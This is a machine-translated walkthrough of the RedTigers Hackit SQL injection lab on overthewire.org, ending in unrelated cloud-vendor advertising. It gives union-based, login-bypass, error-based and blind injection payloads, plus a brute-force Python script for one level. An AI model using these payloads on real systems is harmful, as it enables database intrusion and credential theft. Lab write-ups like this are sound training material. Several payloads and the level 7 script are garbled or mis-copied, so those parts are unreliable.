Penetration Test drill platform RedTigers Hackit customs clearance test
Level 1
A common injection function. You can directly construct a statement.
Https://redtiger.labs.overthewire.org/level1.php? Cat = 1 union select 1, 2, username, password from levelsponusers
Level 2
The question is, if a simple password is bypassed, simply try it. SQL universal password
Username, random password, OR '1' = '1
Bypass successful
Level 3
Try an error... Drunk too
So let's make a mistake ~
Whether it is sqli, but SQL does not return an error. For php reasons
Until
Https://redtiger.labs.overthewire.org/level3.php? Usr [0] = a & usr [1] = B
An error is displayed.
Warning: preg_match () expects parameter 2 to be string, array given in/var/www/hackit/urlcrypt. inc on line 21
Because files such as. inc can be accessed, we have obtained some source code.
<?php
function encrypt($str)
{
$cryptedstr = "";
for ($i =0; $i < strlen($str); $i++)
{
$temp = ord(substr($str,$i,1)) ^ 192;
while(strlen($temp)<3)
{
$temp = "0".$temp;
}
$cryptedstr .= $temp. "";
}
return base64_encode($cryptedstr);
}
function decrypt ($str)
{
if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))
{
$str = base64_decode($str);
if ($str != "" && $str != null && $str != false)
{
$decStr = "";
for ($i=0; $i < strlen($str); $i+=3)
{
$array[$i/3] = substr($str,$i,3);
}
foreach($array as $s)
{
$a = $s^192;
$decStr .= chr($a);
}
return $decStr;
}
return false;
}
return false;
}
?>
This file provides encryption and decryption methods for the usr parameter. Therefore, we use this encryption method to encrypt our statements and obtain the final POC.
Https://redtiger.labs.overthewire.org/level3.php? Usr = disabled
Level 4
Click me.
Query returned 1 rows.
Change the single quotation mark
Query returned 0 rows.
So it should be blind injection.
Order by indicates that there are two columns, although it is useless. First, judge the length.
Https://redtiger.labs.overthewire.org/level4.php? Id = 1 union select keyword, 1 from level4_secret where length (keyword) = 17
17 bytes in total. This time it is definitely not MD5... Write the script and run it again from A-Z a-z 0-9 to get the final result
# -*- coding: utf-8 -*-import requestss = requests.Session()result = ""login = {'password': 'dont_publish_solutions_GRR!', 'level4login': 'Login'}for x in range(1,17): flag = True url = "http://redtiger.labs.overthewire.org/level4.php?id=1 union select keyword,1 from level4_secret where SUBSTR(keyword,%d,1)='%s'" for i in range(ord('a'),ord('z')+1): if(flag == False): break test_url = url % (x,chr(i)) r = s.post(test_url, data = login) if "2 rows" in r.content: result = result + chr(i) flag = False for i in range(ord('A'),ord('Z')+1): if(flag == False): break test_url = url % (x,chr(i)) r = s.post(test_url, data = login) if "2 rows" in r.content: result = result + chr(i) flag = False for i in range(ord('0'),ord('9')+1): if(flag == False): break test_url = url % (x,chr(i)) r = s.post(test_url, data = login) if "2 rows" in r.content: result = result + chr(i) flag = False print resultprint result
Log on and bypass. Several functions are disabled, which is not blind injection. Let's check the error message.
Determine whether the logon is successful based on the number of rows in the final result.Login = Login & password = 1 & username = 'Union select 0x61646d696e as username, md5 (1) as password #
Level 6
Target: Get the first user in table level6_users with status 1
First, check status 1 for common injection, which is not difficult.
POC
Https://redtiger.labs.overthewire.org/level6.php? User = 0% 20 union % 20 select % 201, average, 1%, 20 from % 20level6_users % 20 where % 20 status = 1
Level 7
It is a blind note, but this time it is in the position of the search, the restrictions are more stringent, So we change the keyword ..
So we have the same idea as a Level above.
Re-programming
# -*- coding: utf-8 -*-
import requests
s = requests.Session()
result = ""
login = {'password': 'dont_publish_solutions_GRR!',
'level4login': 'Login'}
for x in range(1,17):
flag = True
url = "http://redtiger.labs.overthewire.org/level4.php?id=1 union select keyword,1 from level4_secret where SUBSTR(keyword,%d,1)='%s'"
for i in range(ord('a'),ord('z')+1):
if(flag == False):
break
test_url = url % (x,chr(i))
r = s.post(test_url, data = login)
if "2 rows" in r.content:
result = result + chr(i)
flag = False
for i in range(ord('A'),ord('Z')+1):
if(flag == False):
break
test_url = url % (x,chr(i))
r = s.post(test_url, data = login)
if "2 rows" in r.content:
result = result + chr(i)
flag = False
for i in range(ord('0'),ord('9')+1):
if(flag == False):
break
test_url = url % (x,chr(i))
r = s.post(test_url, data = login)
if "2 rows" in r.content:
result = result + chr(i)
flag = False
print result
print result
The above Code seems a little problematic.
Level 8
An error is thrown when an 'error base' is added, which is obviously an error base. Then the poc is analyzed and constructed.
Hans @ localhost ', name = password, icq = 'q
Level 9
Still error base
Use a 'to determine whether the injection appears in textarea, and then construct the statement.
'), (Select username from level9_users limit 1), (select password from level9_users limit 1 ),'
Pass
Level 10
Only one Login button is provided. Through packet capture, we can see a base64 encrypted json
DecryptedA: 2: {s: 8: "username"; s: 6: "Monkey"; s: 8: "password"; s: 12: "0815 password ";}
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
